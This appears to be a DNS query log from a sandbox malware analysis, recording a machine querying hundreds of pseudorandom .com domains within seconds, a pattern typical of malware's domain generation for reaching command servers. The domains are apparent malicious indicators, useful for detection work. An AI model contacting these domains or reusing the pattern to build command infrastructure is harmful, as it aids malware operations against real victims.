                                                                                                                                                                                                              Nov 11, 2024 18:33:30.816291094 CET192.168.2.81.1.1.10x7efdStandard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.816520929 CET192.168.2.81.1.1.10x9077Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.817198038 CET192.168.2.81.1.1.10xa255Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.817311049 CET192.168.2.81.1.1.10xddabStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.818660021 CET192.168.2.81.1.1.10x117cStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.217973948 CET192.168.2.81.1.1.10xcc65Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.221962929 CET192.168.2.81.1.1.10x57a0Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.224446058 CET192.168.2.81.1.1.10xbf24Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.227385044 CET192.168.2.81.1.1.10x9201Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.234991074 CET192.168.2.81.1.1.10xd362Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.259632111 CET192.168.2.81.1.1.10x525bStandard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.259815931 CET192.168.2.81.1.1.10x626fStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.267745018 CET192.168.2.81.1.1.10x8d77Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.274095058 CET192.168.2.81.1.1.10x2843Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.279022932 CET192.168.2.81.1.1.10xc12cStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.279340029 CET192.168.2.81.1.1.10x285Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.283075094 CET192.168.2.81.1.1.10xffbfStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.283415079 CET192.168.2.81.1.1.10xa8dcStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.290385008 CET192.168.2.81.1.1.10x3be5Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.294502020 CET192.168.2.81.1.1.10x5569Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.294830084 CET192.168.2.81.1.1.10xcab4Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.297137976 CET192.168.2.81.1.1.10x721Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.300622940 CET192.168.2.81.1.1.10xdebcStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.301147938 CET192.168.2.81.1.1.10xbb95Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.302444935 CET192.168.2.81.1.1.10x4d39Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.314265013 CET192.168.2.81.1.1.10xe192Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.314671993 CET192.168.2.81.1.1.10x8aaeStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.315844059 CET192.168.2.81.1.1.10x586aStandard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.316582918 CET192.168.2.81.1.1.10xce3eStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.318176031 CET192.168.2.81.1.1.10x6b3Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.318377972 CET192.168.2.81.1.1.10xafedStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.319142103 CET192.168.2.81.1.1.10xacd2Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.355079889 CET192.168.2.81.1.1.10xc121Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.355454922 CET192.168.2.81.1.1.10xbbdeStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.355670929 CET192.168.2.81.1.1.10xfa51Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.355814934 CET192.168.2.81.1.1.10x935cStandard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.356214046 CET192.168.2.81.1.1.10x51fcStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.356378078 CET192.168.2.81.1.1.10x2de1Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.356618881 CET192.168.2.81.1.1.10x1147Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.356789112 CET192.168.2.81.1.1.10xa8e8Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.357044935 CET192.168.2.81.1.1.10x1860Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.357244015 CET192.168.2.81.1.1.10x34eStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.357590914 CET192.168.2.81.1.1.10xdf6aStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.357755899 CET192.168.2.81.1.1.10xa379Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.357918024 CET192.168.2.81.1.1.10x778aStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.358175993 CET192.168.2.81.1.1.10xe235Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.358405113 CET192.168.2.81.1.1.10x229cStandard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.358561993 CET192.168.2.81.1.1.10x674bStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.358715057 CET192.168.2.81.1.1.10x34f1Standard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.358863115 CET192.168.2.81.1.1.10xa55Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.366787910 CET192.168.2.81.1.1.10xf725Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.371835947 CET192.168.2.81.1.1.10x867Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.374552011 CET192.168.2.81.1.1.10x296Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.374713898 CET192.168.2.81.1.1.10x8958Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.375189066 CET192.168.2.81.1.1.10xae41Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.375247002 CET192.168.2.81.1.1.10x1150Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.381458044 CET192.168.2.81.1.1.10xbeb8Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.382169008 CET192.168.2.81.1.1.10x45e5Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.382514954 CET192.168.2.81.1.1.10x3f8dStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.382678986 CET192.168.2.81.1.1.10xe29eStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.396511078 CET192.168.2.81.1.1.10x8432Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.398283958 CET192.168.2.81.1.1.10x9cc2Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.438637018 CET192.168.2.81.1.1.10x7a75Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.441355944 CET192.168.2.81.1.1.10x4490Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.442323923 CET192.168.2.81.1.1.10x3faeStandard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.495104074 CET192.168.2.81.1.1.10xec10Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.504266977 CET192.168.2.81.1.1.10x78adStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.504570007 CET192.168.2.81.1.1.10xacb9Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:31.506923914 CET192.168.2.81.1.1.10x14c3Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.339711905 CET192.168.2.81.1.1.10xa35dStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.339997053 CET192.168.2.81.1.1.10x9199Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.340303898 CET192.168.2.81.1.1.10x316dStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.340744972 CET192.168.2.81.1.1.10x2f42Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.342053890 CET192.168.2.81.1.1.10xb232Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.343368053 CET192.168.2.81.1.1.10xb013Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.343898058 CET192.168.2.81.1.1.10x58c8Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.346915007 CET192.168.2.81.1.1.10xb61aStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.347320080 CET192.168.2.81.1.1.10x2a57Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.347352028 CET192.168.2.81.1.1.10x95bfStandard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.349466085 CET192.168.2.81.1.1.10x2e2bStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.349848032 CET192.168.2.81.1.1.10x51b8Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.350549936 CET192.168.2.81.1.1.10x6f1cStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.356761932 CET192.168.2.81.1.1.10x5681Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.357652903 CET192.168.2.81.1.1.10x2a8Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.358021975 CET192.168.2.81.1.1.10x5089Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.358549118 CET192.168.2.81.1.1.10x85dfStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.359194994 CET192.168.2.81.1.1.10xa29eStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.367415905 CET192.168.2.81.1.1.10xe258Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.367717028 CET192.168.2.81.1.1.10x2eeaStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.368053913 CET192.168.2.81.1.1.10x9e52Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.368243933 CET192.168.2.81.1.1.10x23acStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.368397951 CET192.168.2.81.1.1.10x5930Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.368805885 CET192.168.2.81.1.1.10x175eStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.368844986 CET192.168.2.81.1.1.10x5ab3Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.369246960 CET192.168.2.81.1.1.10xb9beStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.399897099 CET192.168.2.81.1.1.10x9910Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.410181999 CET192.168.2.81.1.1.10xda97Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.411288977 CET192.168.2.81.1.1.10xbe14Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.411472082 CET192.168.2.81.1.1.10x2ff9Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423105001 CET192.168.2.81.1.1.10x1074Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423130989 CET192.168.2.81.1.1.10x9a96Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423368931 CET192.168.2.81.1.1.10x4b54Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423564911 CET192.168.2.81.1.1.10x8520Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423655033 CET192.168.2.81.1.1.10x431eStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423743010 CET192.168.2.81.1.1.10xb35fStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423865080 CET192.168.2.81.1.1.10x91b5Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423907042 CET192.168.2.81.1.1.10xde01Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424074888 CET192.168.2.81.1.1.10x3cbaStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424099922 CET192.168.2.81.1.1.10x58f1Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424257040 CET192.168.2.81.1.1.10xd851Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424328089 CET192.168.2.81.1.1.10x59d1Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424648046 CET192.168.2.81.1.1.10x1642Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.429811001 CET192.168.2.81.1.1.10x8dd0Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.429826975 CET192.168.2.81.1.1.10x7149Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430222988 CET192.168.2.81.1.1.10x8bd3Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430423975 CET192.168.2.81.1.1.10xa4e3Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430607080 CET192.168.2.81.1.1.10xa6e3Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430707932 CET192.168.2.81.1.1.10x4e8aStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431159973 CET192.168.2.81.1.1.10xc8a1Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431250095 CET192.168.2.81.1.1.10xb0fcStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431359053 CET192.168.2.81.1.1.10xad8cStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431467056 CET192.168.2.81.1.1.10x2fbaStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431658983 CET192.168.2.81.1.1.10xafbeStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431806087 CET192.168.2.81.1.1.10xb2daStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431977987 CET192.168.2.81.1.1.10xb227Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.432252884 CET192.168.2.81.1.1.10xd5a8Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.432468891 CET192.168.2.81.1.1.10xf0b8Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.435048103 CET192.168.2.81.1.1.10xd769Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.435621023 CET192.168.2.81.1.1.10x688Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.436270952 CET192.168.2.81.1.1.10x5ec3Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.437875032 CET192.168.2.81.1.1.10x94ffStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.449182987 CET192.168.2.81.1.1.10xd4ccStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.450778008 CET192.168.2.81.1.1.10xe36aStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.921614885 CET192.168.2.81.1.1.10x40a3Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.924787998 CET192.168.2.81.1.1.10x6a61Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.925008059 CET192.168.2.81.1.1.10x3b91Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.928534031 CET192.168.2.81.1.1.10xfd6aStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.933621883 CET192.168.2.81.1.1.10xb381Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.934026003 CET192.168.2.81.1.1.10xe516Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.941468954 CET192.168.2.81.1.1.10x26b6Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.945585012 CET192.168.2.81.1.1.10x89bdStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950191975 CET192.168.2.81.1.1.10x8ebdStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950417042 CET192.168.2.81.1.1.10x95ecStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950788975 CET192.168.2.81.1.1.10xeb57Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.987977028 CET192.168.2.81.1.1.10x5284Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.000241041 CET192.168.2.81.1.1.10xcd66Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.003340960 CET192.168.2.81.1.1.10xe96aStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.006463051 CET192.168.2.81.1.1.10x1fe8Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.007777929 CET192.168.2.81.1.1.10xc494Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.009365082 CET192.168.2.81.1.1.10xb31cStandard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.023062944 CET192.168.2.81.1.1.10xb526Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.023260117 CET192.168.2.81.1.1.10x2461Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.024310112 CET192.168.2.81.1.1.10xb183Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.024528027 CET192.168.2.81.1.1.10x3246Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.031016111 CET192.168.2.81.1.1.10xc40eStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.031546116 CET192.168.2.81.1.1.10xa150Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.033189058 CET192.168.2.81.1.1.10x9a64Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.034262896 CET192.168.2.81.1.1.10x799eStandard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.035418034 CET192.168.2.81.1.1.10xdd2dStandard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.066570997 CET192.168.2.81.1.1.10x79f5Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.067236900 CET192.168.2.81.1.1.10x28cfStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.067658901 CET192.168.2.81.1.1.10x8131Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068106890 CET192.168.2.81.1.1.10xffedStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068377018 CET192.168.2.81.1.1.10xdd9aStandard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068881035 CET192.168.2.81.1.1.10x24c2Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.073247910 CET192.168.2.81.1.1.10xe43cStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.079694986 CET192.168.2.81.1.1.10x5b86Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.079937935 CET192.168.2.81.1.1.10x453eStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081267118 CET192.168.2.81.1.1.10x7119Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081557989 CET192.168.2.81.1.1.10xdf55Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081809998 CET192.168.2.81.1.1.10x86c2Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082056999 CET192.168.2.81.1.1.10x6a7dStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082391024 CET192.168.2.81.1.1.10x3b0fStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082875013 CET192.168.2.81.1.1.10xf3c1Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083235025 CET192.168.2.81.1.1.10x4a08Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083498001 CET192.168.2.81.1.1.10x6cc8Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083880901 CET192.168.2.81.1.1.10xca5dStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084041119 CET192.168.2.81.1.1.10x6c27Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084388018 CET192.168.2.81.1.1.10x16bfStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084439039 CET192.168.2.81.1.1.10x576fStandard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084820032 CET192.168.2.81.1.1.10x2539Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085047007 CET192.168.2.81.1.1.10xa880Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085289001 CET192.168.2.81.1.1.10xdbd4Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.085572004 CET192.168.2.81.1.1.10xab3Standard query (0)pufycog.comA (IP address)IN (0x0001)false
